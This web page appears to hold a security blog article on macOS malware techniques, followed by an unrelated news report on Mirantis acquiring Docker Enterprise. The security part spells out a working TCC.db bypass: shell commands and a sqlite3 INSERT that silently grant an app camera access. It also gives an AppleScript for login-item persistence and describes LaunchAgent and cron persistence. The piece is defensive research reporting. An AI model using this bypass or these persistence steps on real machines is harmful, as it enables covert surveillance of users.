A process generally has the privileges of the user who launches it, so clearly when the user is admin – as most are – that gives the process a lot of power to make changes, launch other processes and access resources.


For example, until Mojave, any user launched process could – without requesting any further interaction from the user – read the user’s email database, including encrypted emails, exfiltrate the browser’s entire browsing history and much more besides. These have supposedly been locked down, but various bypasses have already been revealed (see here and here, for example) and they are largely null and void in any case as soon as a user adds the Terminal to Full Disk Access, something that anyone who uses the Terminal is almost certainly going to do.

Any Hack Dropbox Can Do, Zoom Can Do Better

Which brings us to ways that malware authors can access protected resources even without asking. To tell this story, we need to pivot away from malicious developers to legitimate ones for a moment. 

Back in 2016, in my Revealing Dropbox’s dirty little security hack and a subsequent post, I exposed how Dropbox hacks System Preferences to forcibly insert itself into the Accessibility preferences pane giving itself permission to take control of the User Interface, regardless of what choices the user made in System Preferences.

image of dropbox hack

This hack was itself seen in various adware, PUP/PUAs and malware exploit kits. Following a lot of exposure on hacker news and elsewhere, Apple took exception to this, and with the release of macOS Sierra a few months later locked down the TCC database that acts as the backing store for those rights. 

With Mojave and Catalina, Apple added further controls to user privacy, again backed by the TCC SQLite database, including restricting access to the system camera and microphone. 

Beginning in macOS Mojave, users have to consent before an app can access the camera or microphone. And then macOS Catalina further requires consent to record the contents of your screen or the keys that you type on your keyboard.

Importantly, while Apple have made it possible to pre-approve some of the privacy preferences either at the user level or by Mac Admins using MDM configuration profiles, they stressed in WWDC 2019 that access to the camera and microphone could only be pre-denied. Access to these resources could only be acquired at “time of use” through user approval: clicking an ‘Allow’ or ‘Deny’ button in a dialog that pops when the resource is requested by an application.

Enter Zoom into the story. You may remember Zoom were recently in the news regarding using a hidden web server, which it turned out, could easily be hijacked by malicious actors to enable a user’s camera without their permission. It seems the controversy has not made the company any less shy about abusing loophole’s in Apple’s security, albeit in a bid to provide a better experience for its users. Last week, Zoom hit the news again as a document they published themselves shows they had found and implemented another simple bypass to the Camera and Microphone permissions. 

Credits here go to Github user bp88 who developed an entire script for Jamf Pro users wanting to emulate the same effect, but let’s walk through it step by step to see how it works. Let’s use the Calculator.app, clearly something that does not require access to the Camera, for this demo. 

First we have to gather a little information about the app we want to sneak into Privacy preferences, including its bundle identifier and code signature requirements.

$ plutil -p /System/Applications/Calculator.app/Contents/Info.plist | grep -i bundleidentifier

This returns com.apple.Calculator.

We also need it’s code signing requirements in hex form. To get those, we use codesign to extract the requirements.

$ codesign -d -r- /Applications/Calculator.app

Which returns the following:

image if codesign utility

We only want the part after designated  =>. We echo that into the csreq util, which will give us a binary output that we’ll save to a temp file.

$ echo 'identifier "com.apple.calculator" and anchor apple' | csreq -r -b /tmp/req.bin

Using xxd and tr, we take the binary file and convert it into the hex “blob” that the TCC.db expects.

$ xxd -p /tmp/req.bin | tr -d 'n'

We’ll wrap that blob inside X' ' as required by the database syntax.

X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003'.

Finally we need a time stamp, which we can grab with 

$ date +"%s"

All we need to do now is construct our sqlite command based on the database’s schema and execute it.

$ sqlite3 ~/Library/Application Support/com.apple.TCC/TCC.db "INSERT INTO access (service,client,client_type,allowed,prompt_count,csreq,last_modified) VALUES('kTCCServiceCamera', 'com.apple.calculator', '0', '1', '1', X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003', 1573637690)"

gif image of zoom hack

While this is more of a horizontal privilege escalation – meaning, the level of rights remains the same, but the hack allows access to other resources that would normally require further user approval – it nevertheless demonstrates how macOS’s built-in security can easily be bypassed at the user level and without resorting to exploiting low-level vulnerabilities. Expect to see this hack used in the wild by RATs and other malware interested in hijacking the camera and microphone resources. 

Persistence Doesn’t Require Elevated Privileges

If you’ve ever logged in to a Mac only to unexpectedly find that some unwanted app launches itself and slows down the login process, you’ve just experienced the fact that apps don’t need permission or authentication to start up at user login time. With persistence being one of the major objectives of all malware, this is a feature that is widely abused.

There are several ways that apps can ensure they execute on login and before the user takes control of the Desktop, none of which require the application to obtain permission. 

First of all, an app can simply install itself into the Login Items list in System Preferences. Although use of this kind of persistence mechanism is formally deprecated, it’s still widely used and can even be done with a simple AppleScript.

tell application "System Events"
	name of every login item
	if (login item "Persistent App" exists) is false then
		tell application process "Persistent App" to set aPath to POSIX path of its application file as string
		make new login item at end of login items with properties {path:aPath, hidden:false, kind:"Application", name:"Persistent App"}
	end if
end tell


Second, the mechanism that is now officially recommended by Apple to replace deprecated Login Items actually makes it more difficult for users to review and manage. Login Items are now hidden within each application’s own bundle and are entirely managed within the application itself. Apple kindly point out to developers that the older API, unlike the new preferred mechanism, exposes their login item to user interference.

image of login item documentation

As we’ve mentioned before it is possible to enumerate which items are using Login Items, but this requires either writing custom code or running a script, which I’ve previously shared here.

Another root to persistence that does not require the malware authors to engage in privilege escalation techniques is to simply write a LaunchAgent to the user’s Library folder. The LaunchAgents folder does not require permissions to write to, and is by far and away the most prevalent persistence method used on the Mac by malware. That’s largely because most users have no idea that this folder exists – not helped by the fact that Apple chose to hide it by default from 10.7 onwards – and most wouldn’t know what was safe or dangerous to do with it even if they did.

Despite that, given the explosion in adware over the last couple of years, the role of LaunchAgents has started to attract a little more attention as adware infected users turn to community forums seeking help. That in turn has led to a small but rising use of the old cron technologies, which even fewer modern users are aware of. These still function reliably on all versions of macOS right up to and including macOS 10.15 Catalina.

Notice how in this example the malware explicitly calls sudo which throws a permission request to the user as they log in, without explanation other than “confup wants to make changes”. Given the recent rash of infections we’re seeing of this particular item, it’s clearly successful.

image cron reboot

Conclusion

Despite the active and perhaps competitive race among researchers to find the latest path to root, it is rare to see the kind of privilege escalation exploits they develop being actively used in the wild by attackers. What accounts for this disjunction between research and practice is the fact that there are multiple ways for malware authors to achieve their objectives with simpler and more durable techniques. Sometimes, as we’ve seen, privilege escalation isn’t even required and where it is, social engineering or just a plain ask will often do the trick. While unpatched zero days will always be in the armoury of advanced attackers, for the majority of crimeware, they are rarely needed.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Mirantis acquires Docker Enterprise

Mirantis today announced that it has acquired Docker’s Enterprise business and team. Docker Enterprise was very much the heart of Docker’s product lineup, so this sale leaves Docker as a shell of its former, high-flying unicorn self. Docker itself, which installed a new CEO earlier this year, says it will continue to focus on tools that will advance developers’ workflows. Mirantis will keep the Docker Enterprise brand alive, though, which will surely not create any confusion.

With this deal, Mirantis is acquiring Docker Enterprise Technology Platform and all associated IP: Docker Enterprise Engine, Docker Trusted Registry, Docker Unified Control Plane and Docker CLI. It will also inherit all Docker Enterprise customers and contracts, as well as its strategic technology alliances and partner programs. Docker and Mirantis say they will both continue to work on the Docker platform’s open-source pieces.

The companies did not disclose the price of the acquisition, but it’s surely nowhere near Docker’s valuation during any of its last funding rounds. Indeed, it’s no secret that Docker’s fortunes changed quite a bit over the years, from leading the container revolution to becoming somewhat of an afterthought after Google open-sourced Kubernetes and the rest of the industry coalesced around it. It still had a healthy enterprise business, though, with plenty of large customers among the large enterprises. The company says about a third of Fortune 100 and a fifth of Global 500 companies use Docker Enterprise, which is a statistic most companies would love to be able to highlight — and which makes this sale a bit puzzling from Docker’s side, unless the company assumed that few of these customers were going to continue to bet on its technology.

Update: for reasons only known to Docker’s communications team, we weren’t told about this beforehand, but the company also today announced that it has raised a $35 million funding round from Benchmark. This doesn’t change the overall gist of the story below, but it does highlight the company’s new direction.

Here is what Docker itself had to say. “Docker is ushering in a new era with a return to our roots by focusing on advancing developers’ workflows when building, sharing and running modern applications. As part of this refocus, Mirantis announced it has acquired the Docker Enterprise platform business,” Docker said in a statement when asked about this change. “Moving forward, we will expand Docker Desktop and Docker Hub’s roles in the developer workflow for modern apps. Specifically, we are investing in expanding our cloud services to enable developers to quickly discover technologies for use when building applications, to easily share these apps with teammates and the community, and to run apps frictionlessly on any Kubernetes endpoint, whether locally or in the cloud.”

Mirantis itself, too, went through its ups and downs. While it started as a well-funded OpenStack distribution, today’s Mirantis focuses on offering a Kubernetes-centric on-premises cloud platform and application delivery. As the company’s CEO Adrian Ionel told me ahead of today’s announcement, today is possibly the most important day for the company.

So what will Mirantis do with Docker Enterprise? “Docker Enterprise is absolutely aligned and an accelerator of the direction that we were already on,” Ionel told me. “We were very much moving towards Kubernetes and containers aimed at multi-cloud and hybrid and edge use cases, with these goals to deliver a consistent experience to developers on any infrastructure anywhere — public clouds, hybrid clouds, multi-cloud and edge use cases — and make it very easy, on-demand, and remove any operational concerns or burdens for developers or infrastructure owners.”

Mirantis previously had about 450 employees. With this acquisition, it gains another 300 former Docker employees that it needs to integrate into its organization. Docker’s field marketing and sales teams will remain separate for some time, though, Ionel said, before they will be integrated. “Our most important goal is to create no disruptions for customers,” he noted. “So we’ll maintain an excellent customer experience, while at the same time bringing the teams together.”

This also means that for current Docker Enterprise customers, nothing will change in the near future. Mirantis says that it will accelerate the development of the product and merge its Kubernetes and lifecycle management technology into it. Over time, it will also offer a managed services solutions for Docker Enterprise.

While there is already some overlap between Mirantis’ and Docker Enterprise’s customer base, Mirantis will pick up about 700 new enterprise customers with this acquisition.

With this, Ionel argues, Mirantis is positioned to go up against large players like VMware and IBM/Red Hat. “We are the one real cloud-native player with meaningful scale to provide an alternative to them without lock-in into a legacy or existing technology stack.”

While this is clearly a day the Mirantis team is celebrating, it’s hard not to look at this as the end of an era for Docker, too. The company says it will share more about its future plans today, but didn’t make any spokespeople available ahead of this announcement.